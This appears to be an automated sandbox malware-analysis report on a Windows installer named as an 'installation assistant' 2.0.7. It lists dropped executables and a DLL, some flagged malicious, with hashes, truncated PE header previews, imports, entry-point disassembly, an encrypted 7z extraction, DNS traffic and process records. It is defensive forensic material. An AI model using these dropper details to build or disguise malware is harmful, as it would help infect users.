                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6144
                                                                                                              Entropy (8bit):4.720366600008286
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                              MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                              SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                              SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                              SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                              Category:modified
                                                                                                              Size (bytes):3584000
                                                                                                              Entropy (8bit):7.00283805408099
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                                                                                                              MD5:4DB75814BF4A212D3AEBA5831C059402
                                                                                                              SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                                                                                                              SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                                                                                                              SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 13%
                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:modified
                                                                                                              Size (bytes):3366912
                                                                                                              Entropy (8bit):6.530549308235048
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                                                                              MD5:CCFB5265302C0ED10D4EE3C9C00B07B1
                                                                                                              SHA1:C89AAFB9E83EF08F32610D12C15840E3ADD3DD06
                                                                                                              SHA-256:15B6D6F84E5D1A01AE0493EF947045BE2759BF942C603F89A5CD40E01C8894D0
                                                                                                              SHA-512:0E0CE33F8A70E16753FFA8CB37D60998AB4E2D588E4C661C08568678615D473F6391B5E828B203C3DA5423FD71ABDFF322EDBAFF4273867F30C9A42E6523E99C
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6144
                                                                                                              Entropy (8bit):4.720366600008286
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                              MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                              SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                              SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                              SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3584000
                                                                                                              Entropy (8bit):7.00283805408099
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                                                                                                              MD5:4DB75814BF4A212D3AEBA5831C059402
                                                                                                              SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                                                                                                              SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                                                                                                              SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 13%
                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:modified
                                                                                                              Size (bytes):3366912
                                                                                                              Entropy (8bit):6.530549308235048
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                                                                              MD5:CCFB5265302C0ED10D4EE3C9C00B07B1
                                                                                                              SHA1:C89AAFB9E83EF08F32610D12C15840E3ADD3DD06
                                                                                                              SHA-256:15B6D6F84E5D1A01AE0493EF947045BE2759BF942C603F89A5CD40E01C8894D0
                                                                                                              SHA-512:0E0CE33F8A70E16753FFA8CB37D60998AB4E2D588E4C661C08568678615D473F6391B5E828B203C3DA5423FD71ABDFF322EDBAFF4273867F30C9A42E6523E99C
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                                                                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):406
                                                                                                              Entropy (8bit):5.117520345541057
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                                                                                              MD5:9200058492BCA8F9D88B4877F842C148
                                                                                                              SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                                                                                              SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                                                                                              SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                                                                                              Malicious:false
                                                                                                              Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.92104230937537
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 98.04%
                                                                                                              • Inno Setup installer (109748/4) 1.08%
                                                                                                              • InstallShield setup (43055/19) 0.42%
                                                                                                              • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                              File name:#U5b89#U88c5#U52a9#U624b_2.0.7.exe
                                                                                                              File size:5'695'204 bytes
                                                                                                              MD5:b7289fd08cd04c771fd7c9b06477601a
                                                                                                              SHA1:a5b1ad8ed22e819341cadcc8a13ea34cf8a79eb1
                                                                                                              SHA256:a9c6e43902b74d84e8492006beaf718380a1550cfd545a2de6bfc95d69016e28
                                                                                                              SHA512:3fa1db6989481a59d2a4c645f15f743c943e575e6ceba5eec0ddbe5bce4e394a10b1f83132385f350a139aecdbac4e78cf0d09346e46599dad7e92478071dd62
                                                                                                              SSDEEP:98304:XwREQQxJMpnJwpVM+bJr2CsBdh/vRXIXm25Kz4j2dMwZgW:ldJmngtrg/G26XcF
                                                                                                              TLSH:F9461213F2CBE03DE05E0B3B06B2A25494FB6A616526AD578AECB4ECCF351501D3E647
                                                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                              Icon Hash:0c0c2d33ceec80aa
                                                                                                              Entrypoint:0x4a83bc
                                                                                                              Entrypoint Section:.itext
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:6
                                                                                                              OS Version Minor:1
                                                                                                              File Version Major:6
                                                                                                              File Version Minor:1
                                                                                                              Subsystem Version Major:6
                                                                                                              Subsystem Version Minor:1
                                                                                                              Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                                                                                              Instruction
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              add esp, FFFFFFA4h
                                                                                                              push ebx
                                                                                                              push esi
                                                                                                              push edi
                                                                                                              xor eax, eax
                                                                                                              mov dword ptr [ebp-3Ch], eax
                                                                                                              mov dword ptr [ebp-40h], eax
                                                                                                              mov dword ptr [ebp-5Ch], eax
                                                                                                              mov dword ptr [ebp-30h], eax
                                                                                                              mov dword ptr [ebp-38h], eax
                                                                                                              mov dword ptr [ebp-34h], eax
                                                                                                              mov dword ptr [ebp-2Ch], eax
                                                                                                              mov dword ptr [ebp-28h], eax
                                                                                                              mov dword ptr [ebp-14h], eax
                                                                                                              mov eax, 004A2EBCh
                                                                                                              call 00007FE370DD9D75h
                                                                                                              xor eax, eax
                                                                                                              push ebp
                                                                                                              push 004A8AC1h
                                                                                                              push dword ptr fs:[eax]
                                                                                                              mov dword ptr fs:[eax], esp
                                                                                                              xor edx, edx
                                                                                                              push ebp
                                                                                                              push 004A8A7Bh
                                                                                                              push dword ptr fs:[edx]
                                                                                                              mov dword ptr fs:[edx], esp
                                                                                                              mov eax, dword ptr [004B0634h]
                                                                                                              call 00007FE370E6B6FBh
                                                                                                              call 00007FE370E6B24Eh
                                                                                                              lea edx, dword ptr [ebp-14h]
                                                                                                              xor eax, eax
                                                                                                              call 00007FE370E65F28h
                                                                                                              mov edx, dword ptr [ebp-14h]
                                                                                                              mov eax, 004B41F4h
                                                                                                              call 00007FE370DD3E23h
                                                                                                              push 00000002h
                                                                                                              push 00000000h
                                                                                                              push 00000001h
                                                                                                              mov ecx, dword ptr [004B41F4h]
                                                                                                              mov dl, 01h
                                                                                                              mov eax, dword ptr [0049CD14h]
                                                                                                              call 00007FE370E67253h
                                                                                                              mov dword ptr [004B41F8h], eax
                                                                                                              xor edx, edx
                                                                                                              push ebp
                                                                                                              push 004A8A27h
                                                                                                              push dword ptr fs:[edx]
                                                                                                              mov dword ptr fs:[edx], esp
                                                                                                              call 00007FE370E6B783h
                                                                                                              mov dword ptr [004B4200h], eax
                                                                                                              mov eax, dword ptr [004B4200h]
                                                                                                              cmp dword ptr [eax+0Ch], 01h
                                                                                                              jne 00007FE370E7246Ah
                                                                                                              mov eax, dword ptr [004B4200h]
                                                                                                              mov edx, 00000028h
                                                                                                              call 00007FE370E67B48h
                                                                                                              mov edx, dword ptr [004B4200h]
                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0xcb0000x110000x110009d61959cbf275c6bf6376c85f2d2fef4False0.18784466911764705data3.7213394898806054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                                                                                                              RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                                                                                                              RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                                                                                                              RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                                                                                                              RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                                                                                                              RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                                                                                                              RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                                                                                                              RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                                                                                                              RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                                                                                                              RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                                                                                                              RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                                                                                                              RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                                                                                                              RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                                                                                                              RT_STRING0xd8e000x3f8data0.3198818897637795
                                                                                                              RT_STRING0xd91f80x2dcdata0.36475409836065575
                                                                                                              RT_STRING0xd94d40x430data0.40578358208955223
                                                                                                              RT_STRING0xd99040x44cdata0.38636363636363635
                                                                                                              RT_STRING0xd9d500x2d4data0.39226519337016574
                                                                                                              RT_STRING0xda0240xb8data0.6467391304347826
                                                                                                              RT_STRING0xda0dc0x9cdata0.6410256410256411
                                                                                                              RT_STRING0xda1780x374data0.4230769230769231
                                                                                                              RT_STRING0xda4ec0x398data0.3358695652173913
                                                                                                              RT_STRING0xda8840x368data0.3795871559633027
                                                                                                              RT_STRING0xdabec0x2a4data0.4275147928994083
                                                                                                              RT_RCDATA0xdae900x10data1.5
                                                                                                              RT_RCDATA0xdaea00x310data0.6173469387755102
                                                                                                              RT_RCDATA0xdb1b00x2cdata1.1818181818181819
                                                                                                              RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                                                                                                              RT_VERSION0xdb2980x584dataEnglishUnited States0.2790368271954674
                                                                                                              RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                                                                                                              DLLImport
                                                                                                              kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                                                                              comctl32.dllInitCommonControls
                                                                                                              user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                                                                              oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                                                                              advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                                                                                              NameOrdinalAddress
                                                                                                              __dbk_fcall_wrapper20x40fc10
                                                                                                              dbkFCallWrapperAddr10x4b063c
                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishUnited States
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 23, 2024 08:38:26.572391033 CET6012953192.168.2.71.1.1.1
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Dec 23, 2024 08:38:26.572391033 CET192.168.2.71.1.1.10x42e9Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Dec 23, 2024 08:38:26.709383965 CET1.1.1.1192.168.2.70x42e9No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false

                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:0
                                                                                                              Start time:02:38:20
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                              File size:55'320 bytes
                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:1
                                                                                                              Start time:02:38:21
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                              File size:55'320 bytes
                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                              Has elevated privileges:false
